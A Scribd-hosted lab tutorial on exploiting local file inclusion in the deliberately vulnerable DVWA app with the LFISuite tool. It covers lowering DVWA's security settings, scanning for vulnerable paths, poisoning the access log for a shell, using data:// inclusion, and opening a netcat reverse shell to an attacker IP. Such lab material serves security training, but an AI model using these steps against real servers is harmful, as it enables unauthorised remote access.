Scribd Logo
Upload

Welcome to Scribd!

  • Local File Inclusion Hacking Tutorial

    Uploaded by

    Atiya Sharf
    434 views8 pages
    lfisuite

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    lfisuite

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    434 views8 pages

    Local File Inclusion Hacking Tutorial

    Uploaded by

    Atiya Sharf
    lfisuite

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 8

    Local File Inclusion hacking tutorial

    Pre-requisites:
    Kali Linux (installed: Git)

    windows 7,8,10 (installed: WAMP)

    Configuring DVWA on WAMP


    Download DVWA form this site http://www.dvwa.co.uk/
    Unzip the DVWA folder
    Copy all files of DVWA package paste in folder in www folder under WAMP folder
    C:\wamp\www
    New folder named dvwa (C:\wamp\www\dvwa)
    Open configuration folder (C:\wamp\www\dvwa\config)
    Rename config.inc.php.dist file to config.inc.php
    Edit config.inc.php file
    o Edit db-password variable from p@ssw0rd to empty string ()
    o Edit security level variable $_DVWA[ 'default_security_level' ] from 'impossible' to
    'low'

    Edit php.ini file (C:\wamp\bin\php\php5.3.10\php.ini)


    o allow_url_include = Off -> allow_url_include = On
    Open browser (assumed WAMP is running ) and type address in bar
    http://localhost/dvwa/setup.php
    Click on Create/Reset Database button
    Enter default credentials
    o Username: admin
    o Password: password
    When welcome page appears, DVWA configuration is successful.

    Configuring LFI Suite on Kali Linux


    Local file inclusion through LFI suite. It has three attacks;

    Data

    Access log

    Auto-hack modality

    Following are the steps to configure LFI suite;

    First clone lfisuite through this url https://github.com/D35m0nd142/LFISuite.git using


    following command;

    o git clone https://github.com/D35m0nd142/LFISuite.git

    go to recently downloaded folder lfisuite

    o cd lfisuite

    To run the LFI Suite, run python script file lifesuite.py


    o Python lfisuite.py

    Exploiting DVWA site using LFI Suite


    To exploit DVWA site using LFI suite, we need to follow following steps;

    Open the configured DVWA site on Kali Linux machine with Windows IP, which in our case is
    http://192.168.93.141/dvwa/login.php
    Login with the default credentials (admin/password) and then navigate to File Inclusion
    page from left panel. (http://192.168.93.141/dvwa/vulnerabilities/fi/?page=include.php)
    Now we need cookies and to find them we will use Live HTTP Header tool of Firefox (this
    tool is not installed by default).

    Copy the cookie value from the HTTP header

    (Cookie value copied from here is;


    Cookie: security=low; PHPSESSID=m5ag883teq7j3v7bt9dfki1011)
    Now to exploit the page, we will move back to Kali Linux terminal where we ran LFI Suite.
    First we will choose Scanner option and paste copied cookie value.
    For the file containing path to test, we will use pathtotest.txt file, downloaded with LFI Suite.

    Vernerable paths will be highlighted in red.

    Now we will run LFI Suite script once again and this time will choose the Exploiter option
    from the options available.
    We will paste cookie value copied from HTTP header.
    LFI Suite will ask if Tor proxy is to be used to or not and for our case we do not need it.

    There are 9 exploits available in LFI Suite, we will choose Access log exploit (Choice 5).
    Enter the vulnerable access_log url (ex: 'site/index.php?page=../logs/access_log') ->
    http://192.168.93.141/dvwa/vulnerabilities/fi/?page=C:\wamp\logs\access.log
    (Venerable path highlighted by scanner before)

    This gave us shell access of the server, and we can verify it by whoami statement.
    Now we will exit the shell and start LFI Suite script once again for data vulnerability.
    We will choose Exploiter option and the data :// option.
    Then we will enter page url
    Enter the 'data://' vulnerable url (ex: 'http://site/index.php?page=') ->
    http://192.168.93.141/dvwa/vulnerabilities/fi/?page=include.php

    Now to get reverse shell first In another terminal window, we will start listening on port 1234
    o nc lvpa 1234
    Now coming back to LFI Suite script tab, where we have shell access, we will start reverse
    shell by typing command reverseshell
    Entering the IP address of Kali Linux Machine and port 1234
    Enter the ip address to connect back to -> 192.168.93.131 (attacker ip address)
    Enter the port to connect to -> 1234
    Now in the terminal we started listening on port, we have reverse shell access.
    Now we will try the auto hack option which will try all possible hacks and give the shell
    access by first successful method.
    To start auto hack, we will start LFI Suite script once again and choose Exploiter option.
    After giving cookie value, it will give auto_hack option as last available option of available
    hacks, we will select auto_hack option.
    Enter the URL you want to hack-> http://192.168.93.141/dvwa/vulnerabilities/fi/?
    page=include.php
    It gave the shell access by first successful method.

    You might also like